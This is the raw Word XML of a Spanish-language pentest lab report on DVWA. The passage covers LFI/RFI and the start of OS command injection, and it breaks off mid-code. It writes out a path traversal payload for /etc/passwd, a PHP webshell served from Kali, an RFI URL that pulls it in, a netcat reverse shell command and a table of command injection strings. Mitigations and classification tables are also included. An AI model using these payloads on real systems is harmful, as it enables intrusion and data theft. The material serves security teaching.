    <w:p w14:paraId="34CFB690">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Page=include.php es el parametro vulnerable donde agregaremos el comando.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335FBCB4">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Paso 2 — Payload con path traversal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C80C7A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>?page=../../../../</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>../</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7642BDCB">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>→ El servidor devuelve el contenido de /etc/passwd con la lista de usuarios del SO.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E4FC32">
      <w:pPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Paso 3 — Escalar a archivos de configuración con credenciales:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4607B865">
      <w:pPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5486400" cy="263461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7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="2634615"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4185E428">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>IMAGEN 1 — LFI mostrando /etc/passwd con fecha visible en prompt Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A178BB4"/>
    <w:p w14:paraId="68FDBF1B">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Ataque RFI — Ejecución remota de código</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320261D1">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Objetivo: hospedar un PHP malicioso en Kali y lograr que el servidor víctima lo ejecute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A306643"/>
    <w:p w14:paraId="3B6CE96A">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Paso 1 — Crear webshell en Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A06C5B">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>danielaguirre@kali:~$ echo '&lt;?php system($_GET["cmd"]); ?&gt;' &gt; shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC60B8A">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Paso 2 — Servir el archivo por HTTP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105E395C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>danielaguirre@kali:~$ python3 -m http.server 8888</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A7EF89">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Paso 3 — Payload RFI apuntando a la máquina atacante:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCC5C8A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>http://&lt;IP_VICTIMA&gt;/dvwa/vulnerabilities/fi/?page=http://&lt;IP_KALI&gt;:8888/shell.php&amp;cmd=id</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 Respuesta: uid=33(www-data) gid=33(www-data) groups=33(www-data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C560599">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Paso 4 — Reverse shell completa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF0276C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Listener en Kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>danielaguirre@kali:~$ nc -lvnp 4444</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 Payload RFI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>?page=http://&lt;IP_KALI&gt;:8888/shell.php&amp;cmd=nc -e /bin/bash &lt;IP_KALI&gt; 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1E091B">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[IMAGEN 2 — RFI ejecutando id en servidor víctima — fecha visible]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A56E81">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[IMAGEN 3 — Shell reversa recibida en Netcat — fecha visible]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565F6543">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>4. Clasificación técnica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0A3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864"/>
          </w:tcPr>
          <w:p w14:paraId="6DF140FF">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Referencia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
          </w:tcPr>
          <w:p w14:paraId="4334CC32">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Detalle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5467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6F874FE">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CWE-22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41B3211C">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Path Traversal — limitación impropia de rutas a directorios restringidos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6FF1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4BBE9092">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CWE-98</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DCE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="67EB66C3">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>PHP Remote File Inclusion — control impropio de nombre de archivo en include/require</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6F11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507390F">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>OWASP Top 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E201CED">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A05:2021 – Security Misconfiguration / A03:2021 – Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0ED8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2FC9B06E">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CVSS v4.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DCE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="60BCBBB6">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>~9.1 Critical — RCE remoto sin autenticación vía RFI</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="249577B7">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>5. Impacto esperado en un sistema real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2F2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864"/>
          </w:tcPr>
          <w:p w14:paraId="2362D432">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Dimensión CIA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
          </w:tcPr>
          <w:p w14:paraId="0AAEC5AA">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Impacto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
          </w:tcPr>
          <w:p w14:paraId="4587D919">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Justificación</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0699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125C50">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Confidencialidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04AD9A24">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CRÍTICO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25D0632D">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>LFI lee archivos del servidor: /etc/shadow, claves SSH, credenciales de BD, código fuente de la aplicación.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6131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49A11F84">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Integridad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DCE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="4A20045C">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CRÍTICO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DCE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="349036D4">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>RFI ejecuta código arbitrario: puede modificar, crear o eliminar archivos del servidor.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1AE51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539F392">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Disponibilidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BC000AD">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ALTO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1334C241">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Vía RFI se puede interrumpir el servicio, eliminar archivos del sistema o instalar ransomware.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3EB05D59">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>6. Propuesta de mitigación</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2620F995">
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:t>Lista blanca de archivos permitidos: solo incluir valores que pertenezcan a un conjunto predefinido.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F277A0">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>$allowed = ['include1.php', 'include2.php'];</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>if (in_array($_GET['page'], $allowed)) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    include($_GET['page']);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61104E6D">
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:t>Deshabilitar allow_url_include en php.ini: allow_url_include = Off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0048F0C6">
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:t>Sanitizar rutas: eliminar ../, ..\, secuencias %00 y %2e%2e.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3AE05C">
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:t>Principio de mínimo privilegio: el proceso web no debe poder leer fuera del webroot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4494D0">
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:t>WAF: bloquear patrones de path traversal en URLs entrantes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA6D52D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CCCCCC"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>──────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69909510">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="42285456">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerabilidad 6 — Command Injection (Inyección de Comandos OS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5153A85F">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>Teoría</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E020A1C">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La inyección de comandos de sistema operativo (OS Command Injection) ocurre cuando una aplicación construye una llamada a la shell del sistema usando datos controlables por el usuario, sin neutralizar los metacaracteres que el intérprete de comandos utiliza para separar o encadenar instrucciones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172D197B"/>
    <w:p w14:paraId="40B42618">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>A diferencia de SQL Injection (que afecta al motor de base de datos), Command Injection afecta directamente al sistema operativo del servidor. El código inyectado se ejecuta con los privilegios del proceso web (www-data en Apache/Linux), lo que en un servidor mal configurado puede equivaler a acceso de root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FA434C"/>
    <w:p w14:paraId="4EBBC17E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Metacaracteres de shell más frecuentes en ataques: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5E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864"/>
          </w:tcPr>
          <w:p w14:paraId="40A8F7AF">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Metacaracter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
          </w:tcPr>
          <w:p w14:paraId="2A2AC5BA">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Comportamiento</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
          </w:tcPr>
          <w:p w14:paraId="393829B7">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Ejemplo de inyección</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2FF2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6A8F38">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32F6F741">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Ejecuta el segundo comando siempre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FC37C77">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>127.0.0.1 ; id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2B9FA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1E4697A1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>&amp;&amp;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DCE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="0D5B8C50">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Ejecuta el segundo solo si el primero tuvo éxito</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DCE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="4E683850">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>127.0.0.1 &amp;&amp; whoami</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="666B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311C32">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>||</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41B40BF9">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Ejecuta el segundo solo si el primero falló</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4625417E">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>fallo || id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3981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3529F034">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>|</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DCE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="3F415941">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Pipe: salida del primero es input del segundo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DCE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="3971394D">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>127.0.0.1 | cat /etc/passwd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2012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EE3B8">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>`cmd`/$()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="459854FC">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Sustitución de comandos: ejecuta y sustituye por su salida</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A95606D">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>`id`  o  $(id)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F354151"/>
    <w:p w14:paraId="78CAAD97">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Fragmento de código vulnerable (DVWA nivel Low):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4611AC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>// El parámetro 'ip' se concatena directamente al comando del SO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>$target = $_REQUEST['ip'];</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>$cmd = shell_exec('ping -c 4 ' . $target);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>echo $cmd;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
